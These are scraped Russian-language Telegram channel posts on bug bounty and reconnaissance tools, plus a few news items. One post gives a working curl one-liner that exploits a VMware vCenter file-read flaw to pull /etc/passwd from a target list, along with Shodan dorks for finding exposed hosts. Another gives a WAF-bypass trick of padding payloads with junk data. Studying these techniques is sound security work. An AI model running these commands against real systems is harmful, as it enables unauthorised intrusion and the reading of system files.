reconFTW - это инструмент, предназначенный для выполнения автоматизированного сбора информации о целевом домене, путем запуска наилучшего набора инструментов для выполнения сканирования и выявления уязвимостей.
Он объединяет в себе множество популярных инструментов, которые мы уже рассматривали на канале. Подробнее о работе данного инструменты вы можете узнать на GitHub, но будьте уверены, инструмент заслуживает вашего внимания. Ниже представлена схема его работы.
#Web
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9💩1🍓1
Для поиска SSRF на сайте можно воспользоваться инструментом под названием SSRFire. Просто укажите доменное имя сайта, адрес своего сервера (или Burp Collaborator) и ждите результатов.
Также есть опции для поиска XSS и Open Redirect. Для работы инструмента требуются установленные Python 3.7+ и GO.
#Web #XSS #SSRF
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4❤3💩1
Небольшая подборка инструментов, которые позволят вам автоматизировать процесс доркинга.
Online инструменты:
#Web #Recon #Dork
Please open Telegram to view this post
VIEW IN TELEGRAM
💩2
Google IP Search - это инструмент OSINT, написанный на JavaScript и HTML. Он использует Google dorks для ограничения поиска только IPv4-адресами.
#OSINT #Recon
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5❤1💩1
This media is not supported in your browser
VIEW IN TELEGRAM
Новый инструмент командной строки от разработчиков Shodan для быстрого анализа списка IP-адресов и просмотра того, какие из них имеют открытые порты/уязвимости.
#Web #Recon #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3💩1
Анализ сетевого трафика всегда был неотъемлемой частью работы любого сетевого инженера, администратора сети для выявления проблем работоспособности и конфигурации активного оборудования. В этой статье узнаете как же всё таки перехватить трафик.
➖https://telegra.ph/Kak-perehvatit-trafik-v-kommutiruemoj-srede-02-16
Please open Telegram to view this post
VIEW IN TELEGRAM
Если вы столкнулись с WAF, то для POST, PUT или PATCH запросов попробуйте вставить в параметр бесполезные символы с произвольными данными, размером от 8 КБ до 10 МБ, ПЕРЕД вашей вредоносной полезной нагрузкой.
Некоторые WAF прекращают обработку после X символов полезной нагрузки, разрешая все ПОСЛЕ этого. Рандомные символы можно сгенерировать тут.
#WAF #bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
AnonymousOverflow позволяет вам просматривать потоки StackOverflow без загроможденного интерфейса и раскрытия вашего IP-адреса, привычек просмотра и других данных об отпечатках браузера которые преступно собирает StackOverflow.
Этот проект очень легкий по дизайну. Пользовательский интерфейс прост, а внешний интерфейс представляет собой SSR HTML, не требующий JavaScript.
#Privacy
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Отличная статья и видео-разбор, в котором вы узнаете, почему в Codeigniter, иногда можно обойти авторизацию с помощью пустого или рандомного JSON, а также обычной SQL инъекции в названии параметра.
#Web #SQLi
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Authentication Bypass Using Root Array
Lots of #bugbountytips get posted on twitter, but some of them are ... weird. Let's explore the technical details of one tweet to understand where this tip came from, why this tip was wrong, and eventually learn about the real underlaying vulnerability. This…
👍3🔥1💩1
Он различными способами брутит поддомены (пассивный способ, перебор, перестановки, certificate transparency, парсинг исходного кода, аналитика, DNS-записи) и тестирует цели на подверженность различным уязвимостям. В конечном итоге вы получаете максимальный объем информации об исследуемых ресурсах.
#BugBounty #Pentest #Recon
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3❤1💩1
Резолверы играют крайне важную роль в DNS. DNS-резолвер кэширует информацию. К примеру, сайт
example.com расположен на машине с IP-адресом 35.195.226.230. Поэтому кэши резолверов со всего мира будут содержать следующее соответствие: example.com→35.195.226.230.Такие инструменты, как например, masscan, nuclei и т.д. позволяют использовать пользовательский список резолверов.
Используя широкий и актуальный список, мы расширяем возможности нашей разведки и имеем больший диапазон для тестирования сайта.
#Web #DNS
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1💩1
В VMware vCenter обнаружили ряд уязвимостей, среди которых несанкционированное чтение произвольных файлов, SSRF и XSS. Протестировано на версии 7.0.2.00100, информации про полный список уязвимых версий нет.
Для поиска уязвимых хостов можно использовать однострочник:
cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done
Дорк, который можно использовать для поиска в Shodan:http.title:"ID_VC_Welcome"
Для поиска в Zoomeye:app:"VMware vCenter"
#LFI #SSRF #XSSPlease open Telegram to view this post
VIEW IN TELEGRAM
👍1💩1
Усовершенствованный кроссплатформенный инструмент, который автоматизирует процесс обнаружения и использования уязвимостей безопасности SQL-инъекций.
#Tools #BugBounty #Pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4💩2
В этом видео мы с вами разберем остальные специализации, которые существуют в ИБ.
Вы узнаете кто такие фиолетовая, зеленая, желтая, оранжевая и белая команды, а также узнаете какие специалисты входят в эти направления и что они делают.
#Cybersecurity #Video
Please open Telegram to view this post
VIEW IN TELEGRAM
Внедрение внешнего объекта XML (XXE) — не самая распространенная, но зачастую критическая уязвимость. Она позволяет вмешиваться в обработку XML-данных веб-приложением.
Знаете ли вы, что кроме извлечения файлов, XXE можно использовать для выполнения SSRF-атак, скрытой эксфильтрации данных и извлечения данных с помощью сообщений об ошибках.
#XXE
Please open Telegram to view this post
VIEW IN TELEGRAM
Чтобы находить больше целей для поиска уязвимостей, следует проверять не только стандартные веб порты (80 и 443), но и нестандартные, такие как 8080, 10000, 8443 и другие, на которых могут располагаться веб-службы.
Если провести некоторый анализ Shodan и имеющихся там веб-служб, работающих на нестандартных портах, то можно выделить некоторый список наиболее распространённых портов, которые следует проверять во время фазы разведки:
httpx -l targets.list -p 8080,10000,20000,2222,7080,9009,7443,2087,2096,8443,4100,2082,2083,2086,9999,2052,9001,9002,7000,7001,8082,8084,8085,8010,9000,2078,2080,2079,2053,2095,4000,5280,8888,9443,5800,631,8000,8008,8087,84,85,86,88,10125,9003,7071,8383,7547,3434,10443,8089,3004,81,4567,7081,82,444,1935,3000,9998,4433,4431,4443,83,90,8001,8099,80,300,443,591,593,832,981,1010,1311,2480,3128,3333,4243,4711,4712,4993,5000,5104,5108,6543,7396,7474,8014,8042,8069,8081,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8500,8834,8880,8983,9043,9060,9080,9090,9091,9200,9800,9981,12443,16080,18091,18092,20720,28017 -o livesites.result
#Web #ReconPlease open Telegram to view this post
VIEW IN TELEGRAM
🔥3❤2👍2🥴2🤡1
Небольшая подборка полезных генераторов и списков слов с GitHub:
#Web #Wordlist
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🤡1
16 июля 2023 года скончался Кевин Митник, бывший хакер, который когда-то был одним из самых разыскиваемых компьютерных преступников в Соединенных Штатах.
Об этом в среду сообщили компания по обучению кибербезопасности, которую он соосновал. Ему было 59 лет.
#news
Please open Telegram to view this post
VIEW IN TELEGRAM
🫡53😢10😭6😨1
Этот проект включает в себя огромный список фраз для брута сложных паролей (более 20 миллионов) и два файла правил #hashcat. Правила создадут более 1000 вариантов каждой фазы.
#soft #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤1💩1
Администрация Telegram проинформировала пользователей об обновлении рекламной политики. Уточняется, что за счет собранных IP-адресов пользователей, которые не оформили премиум-подписку, будет осуществляться таргетинг рекламы.
Отмечается, что сбор пользовательских IP-адресов позволит рекламодателям демонстрировать объявления в определенных странах и населенных пунктах. В администрации мессенджера подчеркнули, что никакая другая геолокационная информация пользователей для этих целей не собирается и не используется.
Отдельно администрация мессенджера Telegram заявила, что соответствующие изменения коснутся исключительно тех пользователей, которые не оформили премиум-подписку. Поэтому любые данные, в том числе IP-адреса, у пользователей с имеющейся подпиской собираться не будут.
#news
Please open Telegram to view this post
VIEW IN TELEGRAM
👎27🤡18